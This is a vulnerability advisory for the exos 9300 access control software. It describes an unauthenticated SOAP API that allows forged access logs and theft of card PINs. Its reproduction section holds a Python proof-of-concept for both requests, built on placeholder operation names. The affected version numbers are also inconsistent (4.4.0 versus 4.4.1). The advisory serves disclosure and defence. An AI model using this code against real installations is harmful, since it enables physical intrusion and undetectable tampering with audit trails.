dormakaba Kaba exos 9300 Unauthenticated SOAP API Vulnerability Allowing Arbitrary Access Log Manipulation and PIN Retrieval

Vulnerability

A vulnerability exists in the dormakaba Kaba exos 9300 access control management software, prior to version 4.4.0, that allows unauthenticated users to call a SOAP API exposed on TCP port 8002. The API, which manages access events and card information, enforces no authentication at all, so anyone who can reach the port can forge access log entries and retrieve the two-factor authentication PINs associated with enrolled chip cards.

Impact

Exploitation of this vulnerability allows unauthorized manipulation of access logs, so the audit trail can no longer be trusted to show who passed which door and when, and retrieval of the PINs that serve as the second factor for chip cards. With a card's PIN in hand, an attacker could bypass the two-factor protection and gain unauthorized access to secured areas.

Reproduction

The vulnerability can be reproduced by sending a SOAP request, carrying no credentials of any kind, to the exos 9300 server on TCP port 8002. To forge a log entry, the request includes the identifier of the access manager, the badge number of the chip card, and the event details, such as the event ID and log date; the server answers with a confirmation that the log entry has been created. The same unauthenticated interface answers PIN queries: a request carrying the card ID and the access manager identifier returns the PIN enrolled for that card.
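The request shapes described above, as an added example that is not part of the original advisory and not dormakaba code. The advisory names only the fields each request carries; the service namespace, operation names, element names, URL path and SOAPAction values in the script are placeholders chosen for this example (assumptions) and must be replaced with the values from the product's WSDL before it can talk to a real instance. The sample replies at the bottom are constructed, not captured. Note that no credentials are attached anywhere, which is exactly the finding: any host that can reach port 8002 can issue these requests, so run this only against a lab system you own.

```python
"""Added example, not dormakaba code and not part of the original advisory.

Builds the two unauthenticated request types the advisory describes for the
exos 9300 SOAP service on TCP/8002 and parses the reply. Namespace,
operation names, element names, path and SOAPAction are assumptions.
"""
import urllib.request
import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"  # SOAP 1.1 envelope namespace
SVC_NS = "urn:example:exos9300:soap"                      # placeholder (assumption)
SOAP_PATH = "/soap"                                       # placeholder (assumption)
ET.register_namespace("soap", SOAP_ENV)
ET.register_namespace("svc", SVC_NS)


def _envelope(operation, fields):
    """Wrap `fields` in a SOAP 1.1 envelope around <svc:operation>.
    Values go in as element text, so ElementTree escapes <, > and &."""
    env = ET.Element(f"{{{SOAP_ENV}}}Envelope")
    body = ET.SubElement(env, f"{{{SOAP_ENV}}}Body")
    op = ET.SubElement(body, f"{{{SVC_NS}}}{operation}")
    for name, value in fields.items():
        ET.SubElement(op, f"{{{SVC_NS}}}{name}").text = str(value)
    return ET.tostring(env, encoding="utf-8", xml_declaration=True)


def build_log_event_request(access_manager_id, badge_number, event_id, log_date):
    """Log-entry request: access manager, badge number, event ID and log date,
    the fields the advisory lists. Operation and element names are assumed."""
    return _envelope("CreateAccessEvent", {
        "AccessManagerId": access_manager_id,
        "BadgeNumber": badge_number,
        "EventId": event_id,
        "LogDate": log_date,
    })


def build_pin_query_request(access_manager_id, card_id):
    """PIN lookup for an enrolled card. Operation and element names are assumed."""
    return _envelope("GetCardPin", {
        "AccessManagerId": access_manager_id,
        "CardId": card_id,
    })


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on qualified tags."""
    return tag.rsplit("}", 1)[-1]


def request_fields(envelope):
    """Inverse of _envelope: (operation name, {field: text}) for inspection."""
    body = ET.fromstring(envelope).find(f"{{{SOAP_ENV}}}Body")
    op = body[0]
    return _local(op.tag), {_local(el.tag): el.text for el in op}


def parse_response(xml_bytes, result_tag):
    """Text of the first <svc:result_tag> in the reply; raises on a SOAP Fault."""
    body = ET.fromstring(xml_bytes).find(f"{{{SOAP_ENV}}}Body")
    fault = body.find(f"{{{SOAP_ENV}}}Fault")
    if fault is not None:
        raise RuntimeError("SOAP fault: " + (fault.findtext("faultstring") or "unspecified"))
    el = body.find(f".//{{{SVC_NS}}}{result_tag}")
    return el.text if el is not None else None


def send(host, envelope, soap_action, port=8002, timeout=10):
    """POST the envelope to the service. No Authorization header, no cookie,
    no token: the service accepts the request as-is."""
    req = urllib.request.Request(
        f"http://{host}:{port}{SOAP_PATH}", data=envelope, method="POST",
        headers={"Content-Type": "text/xml; charset=utf-8",
                 "SOAPAction": f'"{SVC_NS}/{soap_action}"'})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


# Constructed sample replies (not captured from a real system) for offline parsing.
SAMPLE_LOG_RESPONSE = b"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
               xmlns:svc="urn:example:exos9300:soap">
  <soap:Body><svc:CreateAccessEventResponse><svc:Result>OK</svc:Result>
  </svc:CreateAccessEventResponse></soap:Body>
</soap:Envelope>"""
SAMPLE_FAULT_RESPONSE = b"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body><soap:Fault><faultcode>soap:Client</faultcode>
  <faultstring>unknown access manager</faultstring></soap:Fault></soap:Body>
</soap:Envelope>"""

if __name__ == "__main__":
    import sys
    env = build_log_event_request("AM01", "123456", 7, "2026-01-26T10:22:00Z")
    print(env.decode())
    print(build_pin_query_request("AM01", "123456").decode())
    if len(sys.argv) > 1:  # only contact a server when a host is given explicitly
        print(parse_response(send(sys.argv[1], env, "CreateAccessEvent"), "Result"))
```

Run without arguments the script only prints the two envelopes; pass a host as the first argument to actually send the log-entry request. Field values are inserted as element text through ElementTree rather than string formatting, so a badge number or card ID containing XML metacharacters cannot break the envelope.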

Remediation

Users are advised to update to exos 9300 version 4.4.1 or later, where this vulnerability has been fixed. For versions prior to 4.4.1, manual mitigation steps are available. Consult the dormakaba security advisory page for more details.

Added: Jan 26, 2026, 10:22 AM
Updated: Jan 26, 2026, 3:29 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 3.1
exploitability: 3.6
remediation: 0.0
relevance: 2.4
threat: 1.6
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.